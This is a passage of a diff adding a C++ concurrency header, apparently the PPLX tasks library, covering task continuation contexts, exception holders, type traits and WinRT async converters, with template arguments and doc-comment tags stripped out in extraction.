WINAPI_FAMILY */ +// Not supported without a WINAPI_FAMILY setting. +#define _UITHREADCTXT_SUPPORT 0 +#endif /* WINAPI_FAMILY */ + +#endif /* _UITHREADCTXT_SUPPORT */ + +#if _UITHREADCTXT_SUPPORT +#include +#endif /* _UITHREADCTXT_SUPPORT */ + +#pragma detect_mismatch("PPLXTASKS_WITH_WINRT", "1") +#else /* defined(__cplusplus_winrt) */ +#pragma detect_mismatch("PPLXTASKS_WITH_WINRT", "0") +#endif /* defined(__cplusplus_winrt) */ +#endif /* defined(_MSC_VER) */ + +#ifdef _DEBUG +#define _DBG_ONLY(X) X +#else +#define _DBG_ONLY(X) +#endif // #ifdef _DEBUG + +// std::copy_exception changed to std::make_exception_ptr from VS 2010 to VS 11. +#ifdef _MSC_VER +#if _MSC_VER < 1700 /*IFSTRIP=IGN*/ +namespace std +{ +template +exception_ptr make_exception_ptr(_E _Except) +{ + return copy_exception(_Except); +} +} // namespace std +#endif /* _MSC_VER < 1700 */ +#ifndef PPLX_TASK_ASYNC_LOGGING +#if _MSC_VER >= 1800 && defined(__cplusplus_winrt) +#define PPLX_TASK_ASYNC_LOGGING 1 // Only enable async logging under dev12 winrt +#else +#define PPLX_TASK_ASYNC_LOGGING 0 +#endif +#endif /* !PPLX_TASK_ASYNC_LOGGING */ +#endif /* _MSC_VER */ + +#pragma pack(push, _CRT_PACKING) + +#if defined(_MSC_VER) +#pragma warning(push) +#pragma warning(disable : 28197) +#pragma warning(disable : 4100) // Unreferenced formal parameter - needed for document generation +#pragma warning(disable : 4127) // constant express in if condition - we use it for meta programming +#endif /* defined(_MSC_VER) */ + +// All CRT public header files are required to be protected from the macro new +#pragma push_macro("new") +#undef new + +// stuff ported from Dev11 CRT +// NOTE: this doesn't actually match std::declval. it behaves differently for void! +// so don't blindly change it to std::declval. +namespace stdx +{ +template +_T&& declval(); +} + +/// +/// The pplx namespace provides classes and functions that give you access to the Concurrency Runtime, +/// a concurrent programming framework for C++. For more information, see . +/// +/**/ +namespace pplx +{ +/// +/// A type that represents the terminal state of a task. Valid values are completed and canceled. +/// +/// +/**/ +typedef task_group_status task_status; + +template +class task; +template<> +class task; + +// In debug builds, default to 10 frames, unless this is overridden prior to #includ'ing ppltasks.h. In retail builds, +// default to only one frame. +#ifndef PPLX_TASK_SAVE_FRAME_COUNT +#ifdef _DEBUG +#define PPLX_TASK_SAVE_FRAME_COUNT 10 +#else +#define PPLX_TASK_SAVE_FRAME_COUNT 1 +#endif +#endif + +/// +/// Helper macro to determine how many stack frames need to be saved. When any number less or equal to 1 is specified, +/// only one frame is captured and no stackwalk will be involved. Otherwise, the number of callstack frames will be +/// captured. +/// +/// +/// This needs to be defined as a macro rather than a function so that if we're only gathering one frame, +/// _ReturnAddress() will evaluate to client code, rather than a helper function inside of _TaskCreationCallstack, +/// itself. +/// +#if PPLX_TASK_SAVE_FRAME_COUNT > 1 +#if defined(__cplusplus_winrt) && !defined(_DEBUG) +#pragma message( \ + "WARNING: Redefining PPLX_TASK_SAVE_FRAME_COUNT under Release build for non-desktop applications is not supported; only one frame will be captured!") +#define PPLX_CAPTURE_CALLSTACK() ::pplx::details::_TaskCreationCallstack::_CaptureSingleFrameCallstack(_ReturnAddress()) +#else +#define PPLX_CAPTURE_CALLSTACK() \ + ::pplx::details::_TaskCreationCallstack::_CaptureMultiFramesCallstack(PPLX_TASK_SAVE_FRAME_COUNT) +#endif +#else +#define PPLX_CAPTURE_CALLSTACK() ::pplx::details::_TaskCreationCallstack::_CaptureSingleFrameCallstack(_ReturnAddress()) +#endif + +/// +/// Returns an indication of whether the task that is currently executing has received a request to cancel its +/// execution. Cancellation is requested on a task if the task was created with a cancellation token, and +/// the token source associated with that token is canceled. +/// +/// +/// true if the currently executing task has received a request for cancellation, false otherwise. +/// +/// +/// If you call this method in the body of a task and it returns true, you must respond with a call to +/// cancel_current_task to acknowledge the cancellation request, +/// after performing any cleanup you need. This will abort the execution of the task and cause it to enter into +/// the canceled state. If you do not respond and continue execution, or return instead of calling +/// cancel_current_task, the task will enter the completed state when it is done. +/// state. +/// A task is not cancelable if it was created without a cancellation token. +/// +/// +/// +/// +/// +/**/ +inline bool _pplx_cdecl is_task_cancellation_requested() +{ + return ::pplx::details::_TaskCollection_t::_Is_cancellation_requested(); +} + +/// +/// Cancels the currently executing task. This function can be called from within the body of a task to abort the +/// task's execution and cause it to enter the canceled state. While it may be used in response to +/// the is_task_cancellation_requested function, you may +/// also use it by itself, to initiate cancellation of the task that is currently executing. +/// It is not a supported scenario to call this function if you are not within the body of a task. +/// Doing so will result in undefined behavior such as a crash or a hang in your application. +/// +/// +/**/ +inline __declspec(noreturn) void _pplx_cdecl cancel_current_task() { throw task_canceled(); } + +namespace details +{ +/// +/// Callstack container, which is used to capture and preserve callstacks in ppltasks. +/// Members of this class is examined by vc debugger, thus there will be no public access methods. +/// Please note that names of this class should be kept stable for debugger examining. +/// +class _TaskCreationCallstack +{ +private: + // If _M_SingleFrame != nullptr, there will be only one frame of callstacks, which is stored in _M_SingleFrame; + // otherwise, _M_Frame will store all the callstack frames. + void* _M_SingleFrame; + std::vector _M_frames; + +public: + _TaskCreationCallstack() { _M_SingleFrame = nullptr; } + + // Store one frame of callstack. This function works for both Debug / Release CRT. + static _TaskCreationCallstack _CaptureSingleFrameCallstack(void* _SingleFrame) + { + _TaskCreationCallstack _csc; + _csc._M_SingleFrame = _SingleFrame; + return _csc; + } + + // Capture _CaptureFrames number of callstack frames. This function only work properly for Desktop or Debug CRT. + __declspec(noinline) static _TaskCreationCallstack _CaptureMultiFramesCallstack(size_t _CaptureFrames) + { + _TaskCreationCallstack _csc; + _csc._M_frames.resize(_CaptureFrames); + // skip 2 frames to make sure callstack starts from user code + _csc._M_frames.resize(::pplx::details::platform::CaptureCallstack(&_csc._M_frames[0], 2, _CaptureFrames)); + return _csc; + } +}; +typedef unsigned char _Unit_type; + +struct _TypeSelectorNoAsync +{ +}; +struct _TypeSelectorAsyncOperationOrTask +{ +}; +struct _TypeSelectorAsyncOperation : public _TypeSelectorAsyncOperationOrTask +{ +}; +struct _TypeSelectorAsyncTask : public _TypeSelectorAsyncOperationOrTask +{ +}; +struct _TypeSelectorAsyncAction +{ +}; +struct _TypeSelectorAsyncActionWithProgress +{ +}; +struct _TypeSelectorAsyncOperationWithProgress +{ +}; + +template +struct _NormalizeVoidToUnitType +{ + typedef _Ty _Type; +}; + +template<> +struct _NormalizeVoidToUnitType +{ + typedef _Unit_type _Type; +}; + +template +struct _IsUnwrappedAsyncSelector +{ + static const bool _Value = true; +}; + +template<> +struct _IsUnwrappedAsyncSelector<_TypeSelectorNoAsync> +{ + static const bool _Value = false; +}; + +template +struct _UnwrapTaskType +{ + typedef _Ty _Type; +}; + +template +struct _UnwrapTaskType> +{ + typedef _Ty _Type; +}; + +template +_TypeSelectorAsyncTask _AsyncOperationKindSelector(task<_T>); + +_TypeSelectorNoAsync _AsyncOperationKindSelector(...); + +#if defined(__cplusplus_winrt) +template +struct _Unhat +{ + typedef _Type _Value; +}; + +template +struct _Unhat<_Type ^> +{ + typedef _Type _Value; +}; + +value struct _NonUserType +{ +public: + int _Dummy; +}; + +template +struct _ValueTypeOrRefType +{ + typedef _NonUserType _Value; +}; + +template +struct _ValueTypeOrRefType<_Type, true> +{ + typedef _Type _Value; +}; + +template +_T2 _ProgressTypeSelector(Windows::Foundation::IAsyncOperationWithProgress<_T1, _T2> ^); + +template +_T1 _ProgressTypeSelector(Windows::Foundation::IAsyncActionWithProgress<_T1> ^); + +template +struct _GetProgressType +{ + typedef decltype(_ProgressTypeSelector(stdx::declval<_Type>())) _Value; +}; + +template +struct _IsIAsyncInfo +{ + static const bool _Value = __is_base_of(Windows::Foundation::IAsyncInfo, typename _Unhat<_Type>::_Value); +}; + +template +_TypeSelectorAsyncOperation _AsyncOperationKindSelector(Windows::Foundation::IAsyncOperation<_T> ^); + +_TypeSelectorAsyncAction _AsyncOperationKindSelector(Windows::Foundation::IAsyncAction ^); + +template +_TypeSelectorAsyncOperationWithProgress _AsyncOperationKindSelector( + Windows::Foundation::IAsyncOperationWithProgress<_T1, _T2> ^); + +template +_TypeSelectorAsyncActionWithProgress _AsyncOperationKindSelector(Windows::Foundation::IAsyncActionWithProgress<_T> ^); + +template::_Value> +struct _TaskTypeTraits +{ + typedef typename _UnwrapTaskType<_Type>::_Type _TaskRetType; + typedef decltype(_AsyncOperationKindSelector(stdx::declval<_Type>())) _AsyncKind; + typedef typename _NormalizeVoidToUnitType<_TaskRetType>::_Type _NormalizedTaskRetType; + + static const bool _IsAsyncTask = _IsAsync; + static const bool _IsUnwrappedTaskOrAsync = _IsUnwrappedAsyncSelector<_AsyncKind>::_Value; +}; + +template +struct _TaskTypeTraits<_Type, true> +{ + typedef decltype(((_Type) nullptr)->GetResults()) _TaskRetType; + typedef _TaskRetType _NormalizedTaskRetType; + typedef decltype(_AsyncOperationKindSelector((_Type) nullptr)) _AsyncKind; + + static const bool _IsAsyncTask = true; + static const bool _IsUnwrappedTaskOrAsync = _IsUnwrappedAsyncSelector<_AsyncKind>::_Value; +}; + +#else /* defined (__cplusplus_winrt) */ +template +struct _IsIAsyncInfo +{ + static const bool _Value = false; +}; + +template +struct _TaskTypeTraits +{ + typedef typename _UnwrapTaskType<_Type>::_Type _TaskRetType; + typedef decltype(_AsyncOperationKindSelector(stdx::declval<_Type>())) _AsyncKind; + typedef typename _NormalizeVoidToUnitType<_TaskRetType>::_Type _NormalizedTaskRetType; + + static const bool _IsAsyncTask = false; + static const bool _IsUnwrappedTaskOrAsync = _IsUnwrappedAsyncSelector<_AsyncKind>::_Value; +}; +#endif /* defined (__cplusplus_winrt) */ + +template +auto _IsCallable(_Function _Func, int) -> decltype(_Func(), std::true_type()) +{ + (void)(_Func); + return std::true_type(); +} +template +std::false_type _IsCallable(_Function, ...) +{ + return std::false_type(); +} + +template<> +struct _TaskTypeTraits +{ + typedef void _TaskRetType; + typedef _TypeSelectorNoAsync _AsyncKind; + typedef _Unit_type _NormalizedTaskRetType; + + static const bool _IsAsyncTask = false; + static const bool _IsUnwrappedTaskOrAsync = false; +}; + +template +task<_Type> _To_task(_Type t); + +template +task _To_task_void(_Func f); + +struct _BadContinuationParamType +{ +}; + +template +auto _ReturnTypeHelper(_Type t, _Function _Func, int, int) -> decltype(_Func(_To_task(t))); +template +auto _ReturnTypeHelper(_Type t, _Function _Func, int, ...) -> decltype(_Func(t)); +template +auto _ReturnTypeHelper(_Type t, _Function _Func, ...) -> _BadContinuationParamType; + +template +auto _IsTaskHelper(_Type t, _Function _Func, int, int) -> decltype(_Func(_To_task(t)), std::true_type()); +template +std::false_type _IsTaskHelper(_Type t, _Function _Func, int, ...); + +template +auto _VoidReturnTypeHelper(_Function _Func, int, int) -> decltype(_Func(_To_task_void(_Func))); +template +auto _VoidReturnTypeHelper(_Function _Func, int, ...) -> decltype(_Func()); + +template +auto _VoidIsTaskHelper(_Function _Func, int, int) -> decltype(_Func(_To_task_void(_Func)), std::true_type()); +template +std::false_type _VoidIsTaskHelper(_Function _Func, int, ...); + +template +struct _FunctionTypeTraits +{ + typedef decltype( + _ReturnTypeHelper(stdx::declval<_ExpectedParameterType>(), stdx::declval<_Function>(), 0, 0)) _FuncRetType; + static_assert(!std::is_same<_FuncRetType, _BadContinuationParamType>::value, + "incorrect parameter type for the callable object in 'then'; consider _ExpectedParameterType or " + "task<_ExpectedParameterType> (see below)"); + + typedef decltype( + _IsTaskHelper(stdx::declval<_ExpectedParameterType>(), stdx::declval<_Function>(), 0, 0)) _Takes_task; +}; + +template +struct _FunctionTypeTraits<_Function, void> +{ + typedef decltype(_VoidReturnTypeHelper(stdx::declval<_Function>(), 0, 0)) _FuncRetType; + typedef decltype(_VoidIsTaskHelper(stdx::declval<_Function>(), 0, 0)) _Takes_task; +}; + +template +struct _ContinuationTypeTraits +{ + typedef task< + typename _TaskTypeTraits::_FuncRetType>::_TaskRetType> + _TaskOfType; +}; + +// _InitFunctorTypeTraits is used to decide whether a task constructed with a lambda should be unwrapped. Depending on +// how the variable is declared, the constructor may or may not perform unwrapping. For eg. +// +// This declaration SHOULD NOT cause unwrapping +// task> t1([]() -> task { +// task t2([]() {}); +// return t2; +// }); +// +// This declaration SHOULD cause unwrapping +// task> t1([]() -> task { +// task t2([]() {}); +// return t2; +// }); +// If the type of the task is the same as the return type of the function, no unwrapping should take place. Else normal +// rules apply. +template +struct _InitFunctorTypeTraits +{ + typedef typename _TaskTypeTraits<_FuncRetType>::_AsyncKind _AsyncKind; + static const bool _IsAsyncTask = _TaskTypeTraits<_FuncRetType>::_IsAsyncTask; + static const bool _IsUnwrappedTaskOrAsync = _TaskTypeTraits<_FuncRetType>::_IsUnwrappedTaskOrAsync; +}; + +template +struct _InitFunctorTypeTraits +{ + typedef _TypeSelectorNoAsync _AsyncKind; + static const bool _IsAsyncTask = false; + static const bool _IsUnwrappedTaskOrAsync = false; +}; + +/// +/// Helper object used for LWT invocation. +/// +struct _TaskProcThunk +{ + _TaskProcThunk(const std::function& _Callback) : _M_func(_Callback) {} + + static void _pplx_cdecl _Bridge(void* _PData) + { + _TaskProcThunk* _PThunk = reinterpret_cast<_TaskProcThunk*>(_PData); + _Holder _ThunkHolder(_PThunk); + _PThunk->_M_func(); + } + +private: + // RAII holder + struct _Holder + { + _Holder(_TaskProcThunk* _PThunk) : _M_pThunk(_PThunk) {} + + ~_Holder() { delete _M_pThunk; } + + _TaskProcThunk* _M_pThunk; + + private: + _Holder& operator=(const _Holder&); + }; + + std::function _M_func; + _TaskProcThunk& operator=(const _TaskProcThunk&); +}; + +/// +/// Schedule a functor with automatic inlining. Note that this is "fire and forget" scheduling, which cannot be +/// waited on or canceled after scheduling. +/// This schedule method will perform automatic inlining base on . +/// +/// +/// The user functor need to be scheduled. +/// +/// +/// The inlining scheduling policy for current functor. +/// +static void _ScheduleFuncWithAutoInline(const std::function& _Func, _TaskInliningMode_t _InliningMode) +{ + _TaskCollection_t::_RunTask(&_TaskProcThunk::_Bridge, new _TaskProcThunk(_Func), _InliningMode); +} + +class _ContextCallback +{ + typedef std::function _CallbackFunction; + +#if defined(__cplusplus_winrt) + +public: + static _ContextCallback _CaptureCurrent() + { + _ContextCallback _Context; + _Context._Capture(); + return _Context; + } + + ~_ContextCallback() { _Reset(); } + + _ContextCallback(bool _DeferCapture = false) + { + if (_DeferCapture) + { + _M_context._M_captureMethod = _S_captureDeferred; + } + else + { + _M_context._M_pContextCallback = nullptr; + } + } + + // Resolves a context that was created as _S_captureDeferred based on the environment (ancestor, current context). + void _Resolve(bool _CaptureCurrent) + { + if (_M_context._M_captureMethod == _S_captureDeferred) + { + _M_context._M_pContextCallback = nullptr; + + if (_CaptureCurrent) + { + if (_IsCurrentOriginSTA()) + { + _Capture(); + } +#if _UITHREADCTXT_SUPPORT + else + { + // This method will fail if not called from the UI thread. + HRESULT _Hr = CaptureUiThreadContext(&_M_context._M_pContextCallback); + if (FAILED(_Hr)) + { + _M_context._M_pContextCallback = nullptr; + } + } +#endif /* _UITHREADCTXT_SUPPORT */ + } + } + } + + void _Capture() + { + HRESULT _Hr = + CoGetObjectContext(IID_IContextCallback, reinterpret_cast(&_M_context._M_pContextCallback)); + if (FAILED(_Hr)) + { + _M_context._M_pContextCallback = nullptr; + } + } + + _ContextCallback(const _ContextCallback& _Src) { _Assign(_Src._M_context._M_pContextCallback); } + + _ContextCallback(_ContextCallback&& _Src) + { + _M_context._M_pContextCallback = _Src._M_context._M_pContextCallback; + _Src._M_context._M_pContextCallback = nullptr; + } + + _ContextCallback& operator=(const _ContextCallback& _Src) + { + if (this != &_Src) + { + _Reset(); + _Assign(_Src._M_context._M_pContextCallback); + } + return *this; + } + + _ContextCallback& operator=(_ContextCallback&& _Src) + { + if (this != &_Src) + { + _M_context._M_pContextCallback = _Src._M_context._M_pContextCallback; + _Src._M_context._M_pContextCallback = nullptr; + } + return *this; + } + + bool _HasCapturedContext() const + { + _ASSERTE(_M_context._M_captureMethod != _S_captureDeferred); + return (_M_context._M_pContextCallback != nullptr); + } + + void _CallInContext(_CallbackFunction _Func) const + { + if (!_HasCapturedContext()) + { + _Func(); + } + else + { + ComCallData callData; + ZeroMemory(&callData, sizeof(callData)); + callData.pUserDefined = reinterpret_cast(&_Func); + + HRESULT _Hr = _M_context._M_pContextCallback->ContextCallback( + &_Bridge, &callData, IID_ICallbackWithNoReentrancyToApplicationSTA, 5, nullptr); + if (FAILED(_Hr)) + { + throw ::Platform::Exception::CreateException(_Hr); + } + } + } + + bool operator==(const _ContextCallback& _Rhs) const + { + return (_M_context._M_pContextCallback == _Rhs._M_context._M_pContextCallback); + } + + bool operator!=(const _ContextCallback& _Rhs) const { return !(operator==(_Rhs)); } + +private: + void _Reset() + { + if (_M_context._M_captureMethod != _S_captureDeferred && _M_context._M_pContextCallback != nullptr) + { + _M_context._M_pContextCallback->Release(); + } + } + + void _Assign(IContextCallback* _PContextCallback) + { + _M_context._M_pContextCallback = _PContextCallback; + if (_M_context._M_captureMethod != _S_captureDeferred && _M_context._M_pContextCallback != nullptr) + { + _M_context._M_pContextCallback->AddRef(); + } + } + + static HRESULT __stdcall _Bridge(ComCallData* _PParam) + { + _CallbackFunction* pFunc = reinterpret_cast<_CallbackFunction*>(_PParam->pUserDefined); + (*pFunc)(); + return S_OK; + } + + // Returns the origin information for the caller (runtime / Windows Runtime apartment as far as task continuations + // need know) + static bool _IsCurrentOriginSTA() + { + APTTYPE _AptType; + APTTYPEQUALIFIER _AptTypeQualifier; + + HRESULT hr = CoGetApartmentType(&_AptType, &_AptTypeQualifier); + if (SUCCEEDED(hr)) + { + // We determine the origin of a task continuation by looking at where .then is called, so we can tell + // whether to need to marshal the continuation back to the originating apartment. If an STA thread is in + // executing in a neutral apartment when it schedules a continuation, we will not marshal continuations back + // to the STA, since variables used within a neutral apartment are expected to be apartment neutral. + switch (_AptType) + { + case APTTYPE_MAINSTA: + case APTTYPE_STA: return true; + default: break; + } + } + return false; + } + + union { + IContextCallback* _M_pContextCallback; + size_t _M_captureMethod; + } _M_context; + + static const size_t _S_captureDeferred = 1; +#else /* defined (__cplusplus_winrt) */ +public: + static _ContextCallback _CaptureCurrent() { return _ContextCallback(); } + + _ContextCallback(bool = false) {} + + _ContextCallback(const _ContextCallback&) {} + + _ContextCallback(_ContextCallback&&) {} + + _ContextCallback& operator=(const _ContextCallback&) { return *this; } + + _ContextCallback& operator=(_ContextCallback&&) { return *this; } + + bool _HasCapturedContext() const { return false; } + + void _Resolve(bool) const {} + + void _CallInContext(_CallbackFunction _Func) const { _Func(); } + + bool operator==(const _ContextCallback&) const { return true; } + + bool operator!=(const _ContextCallback&) const { return false; } + +#endif /* defined (__cplusplus_winrt) */ +}; + +template +struct _ResultHolder +{ + void Set(const _Type& _type) { _Result = _type; } + + _Type Get() { return _Result; } + + _Type _Result; +}; + +#if defined(__cplusplus_winrt) + +template +struct _ResultHolder<_Type ^> +{ + void Set(_Type ^ const& _type) { _M_Result = _type; } + + _Type ^ Get() { return _M_Result.Get(); } private : + // ::Platform::Agile handle specialization of all hats + // including ::Platform::String and ::Platform::Array + ::Platform::Agile<_Type ^> _M_Result; +}; + +// +// The below are for composability with tasks auto-created from when_any / when_all / && / || constructs. +// +template +struct _ResultHolder> +{ + void Set(const std::vector<_Type ^>& _type) + { + _Result.reserve(_type.size()); + + for (auto _PTask = _type.begin(); _PTask != _type.end(); ++_PTask) + { + _Result.emplace_back(*_PTask); + } + } + + std::vector<_Type ^> Get() + { + // Return vectory with the objects that are marshaled in the proper apartment + std::vector<_Type ^> _Return; + _Return.reserve(_Result.size()); + + for (auto _PTask = _Result.begin(); _PTask != _Result.end(); ++_PTask) + { + _Return.push_back( + _PTask->Get()); // Platform::Agile will marshal the object to appropriate apartment if necessary + } + + return _Return; + } + + std::vector<::Platform::Agile<_Type ^>> _Result; +}; + +template +struct _ResultHolder> +{ + void Set(const std::pair<_Type ^, size_t>& _type) { _M_Result = _type; } + + std::pair<_Type ^, size_t> Get() { return std::make_pair(_M_Result.first.Get(), _M_Result.second); } + +private: + std::pair<::Platform::Agile<_Type ^>, size_t> _M_Result; +}; + +#endif /* defined (__cplusplus_winrt) */ + +// An exception thrown by the task body is captured in an exception holder and it is shared with all value based +// continuations rooted at the task. The exception is 'observed' if the user invokes get()/wait() on any of the tasks +// that are sharing this exception holder. If the exception is not observed by the time the internal object owned by the +// shared pointer destructs, the process will fail fast. +struct _ExceptionHolder +{ +private: + void ReportUnhandledError() + { +#if _MSC_VER >= 1800 && defined(__cplusplus_winrt) + if (_M_winRTException != nullptr) + { + ::Platform::Details::ReportUnhandledError(_M_winRTException); + } +#endif /* defined (__cplusplus_winrt) */ + } + +public: + explicit _ExceptionHolder(const std::exception_ptr& _E, const _TaskCreationCallstack& _stackTrace) + : _M_exceptionObserved(0) + , _M_stdException(_E) + , _M_stackTrace(_stackTrace) +#if defined(__cplusplus_winrt) + , _M_winRTException(nullptr) +#endif /* defined (__cplusplus_winrt) */ + { + } + +#if defined(__cplusplus_winrt) + explicit _ExceptionHolder(::Platform::Exception ^ _E, const _TaskCreationCallstack& _stackTrace) + : _M_exceptionObserved(0), _M_winRTException(_E), _M_stackTrace(_stackTrace) + { + } +#endif /* defined (__cplusplus_winrt) */ + + __declspec(noinline) ~_ExceptionHolder() + { + if (_M_exceptionObserved == 0) + { + // If you are trapped here, it means an exception thrown in task chain didn't get handled. + // Please add task-based continuation to handle all exceptions coming from tasks. + // this->_M_stackTrace keeps the creation callstack of the task generates this exception. + _REPORT_PPLTASK_UNOBSERVED_EXCEPTION(); + } + } + + void _RethrowUserException() + { + if (_M_exceptionObserved == 0) + { + atomic_exchange(_M_exceptionObserved, 1l); + } + +#if defined(__cplusplus_winrt) + if (_M_winRTException != nullptr) + { + throw _M_winRTException; + } +#endif /* defined (__cplusplus_winrt) */ + std::rethrow_exception(_M_stdException); + } + + // A variable that remembers if this exception was every rethrown into user code (and hence handled by the user). + // Exceptions that are unobserved when the exception holder is destructed will terminate the process. + atomic_long _M_exceptionObserved; + + // Either _M_stdException or _M_winRTException is populated based on the type of exception encountered. + std::exception_ptr _M_stdException; +#if defined(__cplusplus_winrt) + ::Platform::Exception ^ _M_winRTException; +#endif /* defined (__cplusplus_winrt) */ + + // Disassembling this value will point to a source instruction right after a call instruction. If the call is to + // create_task, a task constructor or the then method, the task created by that method is the one that encountered + // this exception. If the call is to task_completion_event::set_exception, the set_exception method was the source + // of the exception. DO NOT REMOVE THIS VARIABLE. It is extremely helpful for debugging. + _TaskCreationCallstack _M_stackTrace; +}; + +#if defined(__cplusplus_winrt) +/// +/// Base converter class for converting asynchronous interfaces to IAsyncOperation +/// +template +ref struct _AsyncInfoImpl abstract : Windows::Foundation::IAsyncOperation<_Result> +{ + internal : + // The async action, action with progress or operation with progress that this stub forwards to. + ::Platform::Agile<_AsyncOperationType> + _M_asyncInfo; + + Windows::Foundation::AsyncOperationCompletedHandler<_Result> ^ _M_CompletedHandler; + + _AsyncInfoImpl(_AsyncOperationType _AsyncInfo) : _M_asyncInfo(_AsyncInfo) {} + +public: + virtual void Cancel() { _M_asyncInfo.Get()->Cancel(); } + virtual void Close() { _M_asyncInfo.Get()->Close(); } + + virtual property Windows::Foundation::HResult ErrorCode + { + Windows::Foundation::HResult get() { return _M_asyncInfo.Get()->ErrorCode; } + } + + virtual property UINT Id + { + UINT get() { return _M_asyncInfo.Get()->Id; } + } + + virtual property Windows::Foundation::AsyncStatus Status + { + Windows::Foundation::AsyncStatus get() { return _M_asyncInfo.Get()->Status; } + } + + virtual _Result GetResults() { throw std::runtime_error("derived class must implement"); } + + virtual property Windows::Foundation::AsyncOperationCompletedHandler<_Result> ^ Completed { + Windows::Foundation::AsyncOperationCompletedHandler<_Result> ^ get() { return _M_CompletedHandler; } + + void set(Windows::Foundation::AsyncOperationCompletedHandler<_Result> ^ value) + { + _M_CompletedHandler = value; + _M_asyncInfo.Get()->Completed = + ref new _CompletionHandlerType([&](_AsyncOperationType, Windows::Foundation::AsyncStatus status) { + _M_CompletedHandler->Invoke(this, status); + }); + } + } +}; + +/// +/// Class _IAsyncOperationWithProgressToAsyncOperationConverter is used to convert an instance of +/// IAsyncOperationWithProgress into IAsyncOperation +/// +template +ref struct _IAsyncOperationWithProgressToAsyncOperationConverter sealed + : _AsyncInfoImpl ^ + , Windows::Foundation::AsyncOperationWithProgressCompletedHandler<_Result, _Progress>, _Result> +{ + internal : _IAsyncOperationWithProgressToAsyncOperationConverter( + Windows::Foundation::IAsyncOperationWithProgress<_Result, _Progress> ^ _Operation) + : _AsyncInfoImpl ^, + Windows::Foundation::AsyncOperationWithProgressCompletedHandler<_Result, _Progress>, + _Result>(_Operation) + { + } + +public: + virtual _Result GetResults() override { return _M_asyncInfo.Get()->GetResults(); } +}; + +/// +/// Class _IAsyncActionToAsyncOperationConverter is used to convert an instance of IAsyncAction into +/// IAsyncOperation<_Unit_type> +/// +ref struct _IAsyncActionToAsyncOperationConverter sealed + : _AsyncInfoImpl +{ + internal : _IAsyncActionToAsyncOperationConverter(Windows::Foundation::IAsyncAction ^ _Operation) + : _AsyncInfoImpl(_Operation) + { + } + +public: + virtual details::_Unit_type GetResults() override + { + // Invoke GetResults on the IAsyncAction to allow exceptions to be thrown to higher layers before returning a + // dummy value. + _M_asyncInfo.Get()->GetResults(); + return details::_Unit_type(); + } +}; + +/// +/// Class _IAsyncActionWithProgressToAsyncOperationConverter is used to convert an instance of +/// IAsyncActionWithProgress into IAsyncOperation<_Unit_type> +/// +template +ref struct _IAsyncActionWithProgressToAsyncOperationConverter sealed + : _AsyncInfoImpl ^ + , Windows::Foundation::AsyncActionWithProgressCompletedHandler<_Progress>, details::_Unit_type> +{ + internal + : _IAsyncActionWithProgressToAsyncOperationConverter(Windows::Foundation::IAsyncActionWithProgress<_Progress> ^ + _Action) + : _AsyncInfoImpl ^, + Windows::Foundation::AsyncActionWithProgressCompletedHandler<_Progress>, + details::_Unit_type>(_Action) + { + } + +public: + virtual details::_Unit_type GetResults() override + { + // Invoke GetResults on the IAsyncActionWithProgress to allow exceptions to be thrown before returning a dummy + // value. + _M_asyncInfo.Get()->GetResults(); + return details::_Unit_type(); + } +}; +#endif /* defined (__cplusplus_winrt) */ +} // namespace details + +/// +/// The task_continuation_context class allows you to specify where you would like a continuation to be +/// executed. It is only useful to use this class from a Windows Store app. For non-Windows Store apps, the task +/// continuation's execution context is determined by the runtime, and not configurable. +/// +/// +/**/ +class task_continuation_context : public details::_ContextCallback +{ +public: + /// + /// Creates the default task continuation context. + /// + /// + /// The default continuation context. + /// + /// + /// The default context is used if you don't specify a continuation context when you call the then + /// method. In Windows applications for Windows 7 and below, as well as desktop applications on Windows 8 and + /// higher, the runtime determines where task continuations will execute. However, in a Windows Store app, the + /// default continuation context for a continuation on an apartment aware task is the apartment where + /// then is invoked. An apartment aware task is a task that unwraps a Windows Runtime + /// IAsyncInfo interface, or a task that is descended from such a task. Therefore, if you schedule a + /// continuation on an apartment aware task in a Windows Runtime STA, the continuation will execute in that + /// STA. A continuation on a non-apartment aware task will execute in a context the Runtime + /// chooses. + /// + /**/ + static task_continuation_context use_default() + { +#if defined(__cplusplus_winrt) + // The callback context is created with the context set to CaptureDeferred and resolved when it is used in + // .then() + return task_continuation_context( + true); // sets it to deferred, is resolved in the constructor of _ContinuationTaskHandle +#else /* defined (__cplusplus_winrt) */ + return task_continuation_context(); +#endif /* defined (__cplusplus_winrt) */ + } + +#if defined(__cplusplus_winrt) + /// + /// Creates a task continuation context which allows the Runtime to choose the execution context for a + /// continuation. + /// + /// + /// A task continuation context that represents an arbitrary location. + /// + /// + /// When this continuation context is used the continuation will execute in a context the runtime chooses even + /// if the antecedent task is apartment aware. use_arbitrary can be used to turn off the default + /// behavior for a continuation on an apartment aware task created in an STA. This method is only + /// available to Windows Store apps. + /// + /**/ + static task_continuation_context use_arbitrary() + { + task_continuation_context _Arbitrary(true); + _Arbitrary._Resolve(false); + return _Arbitrary; + } + + /// + /// Returns a task continuation context object that represents the current execution context. + /// + /// + /// The current execution context. + /// + /// + /// This method captures the caller's Windows Runtime context so that continuations can be executed in the right + /// apartment. The value returned by use_current can be used to indicate to the Runtime that the + /// continuation should execute in the captured context (STA vs MTA) regardless of whether or not the antecedent + /// task is apartment aware. An apartment aware task is a task that unwraps a Windows Runtime IAsyncInfo + /// interface, or a task that is descended from such a task. This method is only available to + /// Windows Store apps. + /// + /**/ + static task_continuation_context use_current() + { + task_continuation_context _Current(true); + _Current._Resolve(true); + return _Current; + } +#endif /* defined (__cplusplus_winrt) */ + +private: + task_continuation_context(bool _DeferCapture = false) : details::_ContextCallback(_DeferCapture) {} +}; + +class task_options; +namespace details +{ +struct _Internal_task_options +{ + bool _M_hasPresetCreationCallstack; + _TaskCreationCallstack _M_presetCreationCallstack; + + void _set_creation_callstack(const _TaskCreationCallstack& _callstack) + { + _M_hasPresetCreationCallstack = true; + _M_presetCreationCallstack = _callstack; + } + _Internal_task_options() { _M_hasPresetCreationCallstack = false; } +}; + +inline _Internal_task_options& _get_internal_task_options(task_options& options); +inline const _Internal_task_options& _get_internal_task_options(const task_options& options); +} // namespace details +/// +/// Represents the allowed options for creating a task +/// +class task_options +{ +public: + /// + /// Default list of task creation options + /// + task_options() + : _M_Scheduler(get_ambient_scheduler()) + , _M_CancellationToken(cancellation_token::none()) + , _M_ContinuationContext(task_continuation_context::use_default()) + , _M_HasCancellationToken(false) + , _M_HasScheduler(false) + { + } + + /// + /// Task option that specify a cancellation token + /// + task_options(cancellation_token _Token) + : _M_Scheduler(get_ambient_scheduler()) + , _M_CancellationToken(_Token) + , 